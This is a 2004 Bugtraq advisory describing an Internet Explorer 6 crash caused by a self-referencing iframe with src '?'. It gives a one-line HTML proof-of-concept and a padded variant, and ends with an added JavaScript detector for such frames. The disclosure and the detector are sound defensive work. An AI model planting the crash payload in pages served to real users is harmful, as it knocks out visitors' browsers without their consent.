Message-ID: <002201c41cbb$77aa7b60$6800a8c0@sec>
Date: Wed, 7 Apr 2004 17:14:54 +0100
From: "E.Kellinis" <me@...her.org.uk>
To: <bugtraq@...urityfocus.com>
Subject: Internet Explorer 6 - Crash
Formal Report
#########################################
Application: Internet Explorer
Vendors: http://www.microsoft.com
Version: 6.0.2800
Platforms: Windows
Bug: Crash(D.O.S)
Risk: Low
Exploitation: Local with browser
Date: 7 Apr 2004
Author: Emmanouel Kellinis
e-mail: me@...her(dot)org(dot)uk
web: http://www.cipher.org.uk
List : BugTraq(SecurityFocus)
#########################################
=======
Product
=======
A popular Web browser, created by Microsoft,
used to view pages on the World Wide Web.
===
Bug
===
The IFRAME element (tag) creates an inline frame
that contains another document. If you use the
character '?' as the document, Internet Explorer
starts an infinite loop of IFRAMEs inside IFRAMEs,
which causes IE to crash.
=====================
Proof Of Concept Code
=====================
Create a web page and add an IFRAME which
points to --> ?
Example : < iframe src= " ? " >
This crashes IE 6 completely in about 20 seconds, consumes
more than 24 MB of RAM and uses 99% of the CPU.
Additionally, memory consumption and the time to crash
can vary, depending on how many characters you add
after the '?' character.
< iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA " >
Emmanouel Kellinis
http://www.cipher.org.uk
=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================
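
The '?' value is a relative URL reference that resolves to the embedding page's own URL with an empty query string, so the page frames itself. The following is an added example, not part of the original post: a defender-side JavaScript check that flags frames whose src resolves back to the document containing them. The name findSelfFrames, the sample URL and the markup are constructed for illustration, and <base href> is assumed to be absent.

```javascript
// Added example: flag <iframe>/<frame> tags whose src resolves to the
// embedding document itself. All names and sample data are constructed.

// Opening frame tags; tolerates the "< iframe" spacing used in the report.
const FRAME_TAG = /<\s*i?frame\b([^>]*)>/gi;
// src attribute only (not data-src), quoted or unquoted value.
const SRC_ATTR = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

// Same document = same origin and path. Query and fragment are ignored,
// because "?" or "?AAAA" only change the query of the page's own URL.
function sameDocument(a, b) {
  return a.origin === b.origin && a.pathname === b.pathname;
}

function findSelfFrames(pageUrl, html) {
  const page = new URL(pageUrl);
  const hits = [];
  for (const tag of html.matchAll(FRAME_TAG)) {
    const m = SRC_ATTR.exec(tag[1]);
    if (!m) continue;
    const raw = (m[1] ?? m[2] ?? m[3]).trim();
    if (raw === "") continue; // an empty src loads about:blank, not the page
    let resolved;
    try {
      resolved = new URL(raw, page); // relative reference -> absolute URL
    } catch {
      continue; // unparsable src: nothing to compare
    }
    if (sameDocument(resolved, page)) {
      hits.push({ src: raw, resolved: resolved.href });
    }
  }
  return hits;
}

// Constructed sample page: two self-referencing frames and one ordinary frame.
const SAMPLE_URL = "http://intranet.example/app/page.html";
const SAMPLE_HTML = `
  <p>dashboard</p>
  < iframe src= " ? " >
  <iframe src='?AAAA'></iframe>
  <iframe src="other.html"></iframe>`;

for (const hit of findSelfFrames(SAMPLE_URL, SAMPLE_HTML)) {
  console.log(`self-referencing frame: src=${JSON.stringify(hit.src)} -> ${hit.resolved}`);
}
```
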